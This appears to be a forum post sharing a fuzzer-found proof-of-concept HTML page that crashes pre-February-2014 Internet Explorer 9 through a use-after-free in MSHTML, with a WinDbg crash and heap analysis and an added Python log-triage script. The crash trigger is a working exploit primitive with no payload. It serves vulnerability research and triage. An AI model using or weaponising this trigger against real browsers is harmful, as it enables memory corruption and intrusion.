Internet Explorer 9 Use After Free bug which was reported in January 2014 and patched in Feb/March 2014 (I don't remember the CVE as I lost my backup, but I found this POC somewhere recently, so I thought of sharing). This one is one of the first POC/crashes generated by my then-new fuzzing framework (Aayudh).

The POC should work on Internet Explorer prior to the Feb 2014 patch.

I don't even remember if this one is a reduced POC or a raw POC.

Code:
<!doctype html><html><HEAD><title></title>

<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>

</style>
<script>function grind(){


 document.body.contentEditable = 'true';
try {
var elt2 = document.getElementById('p22');
var rElmt1 = 'p16';
} 
catch(e){}
var i = 0;
try{
elt2.addEventListener("DOMNodeRemoved",function(){
document.execCommand('insertunorderedlist', null, true);
elt2.innerText="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
}, false);}
catch(e){}

try{

   var mySpan = document.getElementById (rElmt1);       
   var myRange = document.createRange ();			
   myRange.selectNodeContents (mySpan);			
   mySpan.innerHTML = "<ruby><audio><video><bd><a><b>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</b>";
   document.execCommand("SelectAll");
   document.execCommand("Delete");
}

catch(e){}

}</script></HEAD>


<body onload='grind();'><figure id="p16">AAAA 16</figure><input type=email id="p17">AAAA 17</input type=email><acronym id="p18">AAAA 18</acronym><embed id="p19">AAAA 19</embed><nav id="p20">AAAA 20</nav><details id="p21">AAAA 21</details><object id="p22">AAAA 22</object><rp id="p23">AAAA 23</rp><address id="p24">AAAA 24</address><h6 id="p25">AAAA 25</h6><b id="p26">AAAA 26</b><article id="p27">AAAA 27</article><textarea id="p28">AAAA 28</textarea><input type=url id="p29">AAAA 29</input type=url>"
</body></html>

Call Stack:
Code:
Full Page Heap Enabled
=================

1:021> g
(34c.37c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=7ffa7868 ecx=f0f0f0f0 edx=002c0174 esi=750d7f48 edi=8007000e
eip=6a1ae2a1 esp=059381a8 ebp=059381b4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
MSHTML!CElement::get_currentStyle+0xfe:
6a1ae2a1 8b5108          mov     edx,dword ptr [ecx+8] ds:0023:f0f0f0f8=????????
1:019> ub
MSHTML!CElement::get_currentStyle+0xe5:
6a1ae28c 50              push    eax
6a1ae28d 684c3d136a      push    offset MSHTML!IID_IHTMLCurrentStyle (6a133d4c)
6a1ae292 53              push    ebx
6a1ae293 ffd1            call    ecx
6a1ae295 8bf8            mov     edi,eax
6a1ae297 85ff            test    edi,edi
6a1ae299 0f856bc60f00    jne     MSHTML!CElement::get_currentStyle+0xf4 (6a2aa90a)
6a1ae29f 8b0b            mov     ecx,dword ptr [ebx]
1:019> u
MSHTML!CElement::get_currentStyle+0xfe:
6a1ae2a1 8b5108          mov     edx,dword ptr [ecx+8] <----- Crashing Instruction
6a1ae2a4 53              push    ebx
6a1ae2a5 ffd2            call    edx
6a1ae2a7 5e              pop     esi
6a1ae2a8 5b              pop     ebx
6a1ae2a9 85ff            test    edi,edi
6a1ae2ab 0f8866c60f00    js      MSHTML!CElement::get_currentStyle+0x10a (6a2aa917)
6a1ae2b1 8bc7            mov     eax,edi
1:019> dd ebx
7ffa7868  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
7ffa7878  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
7ffa7888  f0f0f0f0 f0f0f0f0 f0f0f0f0 a0a0a0a0
7ffa7898  a0a0a0a0 f0f0f0f0 00000000 00000000
7ffa78a8  25759b19 0001c500 7ffa39a8 002c00c4
7ffa78b8  28769b17 1001c50f abcdaaa9 80061000
7ffa78c8  00000028 00000050 00000002 7ffa72d8
7ffa78d8  00e69c5c dcbaaaa9 f0f0f0f0 f0f0f0f0
1:019> !heap -p -a ebx
    address 7ffa7868 found in
    _HEAP @ 2c0000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        7ffa7840 000d 0000  [00]   7ffa7868    0002c - (free DelayedFree)
        6e04a7d6 verifier!AVrfpDphNormalHeapFree+0x000000b6
        6e0490d3 verifier!AVrfDebugPageHeapFree+0x000000e3
        77026694 ntdll!RtlDebugFreeHeap+0x0000002f
        76fea13e ntdll!RtlpFreeHeap+0x0000005d
        76fb65a6 ntdll!RtlFreeHeap+0x00000142
        7585c3d4 kernel32!HeapFree+0x00000014
        6a262089 MSHTML!CW3CComputedStyle::`scalar deleting destructor'+0x00000044   
        6a20af55 MSHTML!CBase::PrivateRelease+0x00000086
        6a2aa912 MSHTML!CElement::get_currentStyle+0x000000fc
        6a1aed45 MSHTML!CElement::ContextThunk_get_currentStyle+0x00000058
        6a86fc73 MSHTML!GetWhitespaceStyle+0x00000035
        6a86fd18 MSHTML!IsElementWhitespaceVisuallyCollapsed+0x0000003b
        6a86fdb3 MSHTML!CEditPointer::IsCurrentScopeWhitespaceVisuallyCollapsed+0x0000003d
        6a83c8a7 MSHTML!CBlockCommand::SanitizeSegment+0x000004b9
        6a836253 MSHTML!CListCommand::PrivateExec+0x00000176
        6a039dbf MSHTML!CCommand::Exec+0x00000044
        6a039f0d MSHTML!CMshtmlEd::Exec+0x0000018f
        6a2b2008 MSHTML!CEditRouter::ExecEditCommand+0x00000185
        6a24fc55 MSHTML!CDoc::ExecHelper+0x00004b78
        6a41ea15 MSHTML!CDocument::Exec+0x00000024
        6a4d0f28 MSHTML!CBase::execCommand+0x0000005b
        6a4212ff MSHTML!CDocument::execCommand+0x00000095
        6a5f6441 MSHTML!CFastDOM::CDocument::Trampoline_execCommand+0x0000013a
        6af18456 jscript9!Js::JavascriptFunction::CallFunction+0x000000c4
        6af57d68 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000117

1:019> ub 6a262089
MSHTML!CW3CComputedStyle::`scalar deleting destructor'+0x29:
6a26206e ff15d813e369    call    dword ptr [MSHTML!_imp__InterlockedDecrement (69e313d8)]
6a262074 f6450801        test    byte ptr [ebp+8],1
6a262078 740f            je      MSHTML!CW3CComputedStyle::`scalar deleting destructor'+0x44 (6a262089)
6a26207a a180e68e6a      mov     eax,dword ptr [MSHTML!g_hProcessHeap (6a8ee680)]
6a26207f 56              push    esi
6a262080 6a00            push    0
6a262082 50              push    eax
6a262083 ff158c13e369    call    dword ptr [MSHTML!_imp__HeapFree (69e3138c)]

The heap block is freed by the function MSHTML!CW3CComputedStyle::`scalar deleting destructor'+0x00000044.


1:019> kb
ChildEBP RetAddr  Args to Child              
059381b4 6a1aed45 74f3ca38 059381f0 750d7f48 MSHTML!CElement::get_currentStyle+0xfe
059381d8 6a86fc73 74f3ca38 059381f0 77198410 MSHTML!CElement::ContextThunk_get_currentStyle+0x58
059381f8 6a86fd18 05938288 77198410 059382cf MSHTML!GetWhitespaceStyle+0x35
05938210 6a86fdb3 00000000 00000001 00000001 MSHTML!IsElementWhitespaceVisuallyCollapsed+0x3b
05938224 6a83c8a7 77198410 00000000 00000000 MSHTML!CEditPointer::IsCurrentScopeWhitespaceVisuallyCollapsed+0x3d
059382d0 6a836253 0c2cefe8 7ffa6400 0c2cefe8 MSHTML!CBlockCommand::SanitizeSegment+0x4b9
05938324 6a039dbf 00000002 05938ed0 00000000 MSHTML!CListCommand::PrivateExec+0x176
05938344 6a039f0d 00000002 05938ed0 00000000 MSHTML!CCommand::Exec+0x44
05938370 6a2b2008 0c07af78 6a2167a4 00000889 MSHTML!CMshtmlEd::Exec+0x18f
059383a8 6a24fc55 0b6d4ff0 6a2167a4 00000889 MSHTML!CEditRouter::ExecEditCommand+0x185
05938e78 6a41ea15 080ecfb8 6a2167a4 00000889 MSHTML!CDoc::ExecHelper+0x4b78
05938e98 6a4d0f28 080ecfb8 6a2167a4 00000889 MSHTML!CDocument::Exec+0x24
05938ec0 6a4212ff 080ecfb8 00000889 0593000b MSHTML!CBase::execCommand+0x5b
05938ef8 6a5f6441 00000001 0b56efd4 00000000 MSHTML!CDocument::execCommand+0x95
05938f88 6af18456 053d3f00 10000004 053cba50 MSHTML!CFastDOM::CDocument::Trampoline_execCommand+0x13a
05938fcc 6af57d68 053d3f00 6a5f6307 10000004 jscript9!Js::JavascriptFunction::CallFunction+0xc4
05939020 04fa0a45 05939020 10000004 053cba50 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117
WARNING: Frame IP not in any known module. Following frames may be wrong.
05939058 6af18456 07bd65e0 00000002 07bd1210 0x4fa0a45
05939094 6af1837b 07bd65e0 04fa0970 00000002 jscript9!Js::JavascriptFunction::CallFunction+0xc4
059390f8 6af182b2 0936f958 00000002 059391f0 jscript9!Js::JavascriptFunction::CallRootFunction+0xb6
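As an added triage example (not part of the original post), the Python script below parses a constructed WinDbg page-heap log built from the values above: it flags registers that hold the 0xF0 freed-fill pattern instead of a pointer, reads the block state from the `!heap -p -a` output, counts freed-fill dwords in the `dd` rows, and names the first non-allocator frame on the free stack, which is how the post's conclusion about the CW3CComputedStyle destructor is reached. The fill-byte meanings (0xF0 freed, 0xE0 allocated, 0xA0 suffix guard) are the page heap conventions assumed here.

```python
import re

# Constructed sample: a trimmed WinDbg page-heap session with values copied from the post above.
SAMPLE = """\
(34c.37c): Access violation - code c0000005 (first chance)
eax=00000000 ebx=7ffa7868 ecx=f0f0f0f0 edx=002c0174 esi=750d7f48 edi=8007000e
6a1ae2a1 8b5108          mov     edx,dword ptr [ecx+8] ds:0023:f0f0f0f8=????????
1:019> dd ebx
7ffa7868  f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
7ffa7878  f0f0f0f0 f0f0f0f0 f0f0f0f0 a0a0a0a0
1:019> !heap -p -a ebx
    address 7ffa7868 found in
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        7ffa7840 000d 0000  [00]   7ffa7868    0002c - (free DelayedFree)
        6e04a7d6 verifier!AVrfpDphNormalHeapFree+0x000000b6
        77026694 ntdll!RtlDebugFreeHeap+0x0000002f
        6a262089 MSHTML!CW3CComputedStyle::`scalar deleting destructor'+0x00000044
"""

FREED_FILL = 0xF0  # page heap fills freed user data with 0xF0 (0xE0 = live data, 0xA0 = suffix guard)
HEAP_FRAMES = ("verifier!", "ntdll!", "kernel32!")  # allocator plumbing, not the owner of the block

def fill_byte(value):
    """Repeated byte of a 32-bit value if all four bytes are equal, else None."""
    bs = {(value >> s) & 0xFF for s in (0, 8, 16, 24)}
    return bs.pop() if len(bs) == 1 else None

def triage(log):
    """Collect the use-after-free evidence from a WinDbg log and score it."""
    r = {"av": "Access violation" in log, "regs": {}, "fault_addr": None, "block_state": None, "freed_by": None, "freed_dwords": 0}
    for name, val in re.findall(r"\b(e[a-d]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})", log):
        r["regs"][name] = int(val, 16)
    # registers holding the freed-fill pattern instead of a real pointer (ecx here)
    r["freed_fill_regs"] = sorted(n for n, v in r["regs"].items() if fill_byte(v) == FREED_FILL)
    m = re.search(r"\bds:[0-9a-f]{4}:([0-9a-f]{8})=\?", log)  # faulting read in the disassembly
    if m:
        r["fault_addr"] = int(m.group(1), 16)
    for row in re.findall(r"^[0-9a-f]{8}  ((?:[0-9a-f]{8} ?)+)$", log, re.M):  # dd rows
        r["freed_dwords"] += sum(fill_byte(int(d, 16)) == FREED_FILL for d in row.split())
    m = re.search(r"UserSize - state\s*\n.*?- \((\w+)", log)  # !heap -p -a block state
    if m:
        r["block_state"] = m.group(1)
    # first frame of the free stack outside the heap machinery: the code that released the block
    free_stack = log[log.find("found in"):] if "found in" in log else ""
    for frame in re.findall(r"^\s*[0-9a-f]{8} (\S+!.+?)\s*$", free_stack, re.M):
        if not frame.startswith(HEAP_FRAMES):
            r["freed_by"] = frame
            break
    r["likely_uaf"] = bool(r["av"] and r["freed_fill_regs"] and r["block_state"] == "free")
    return r
```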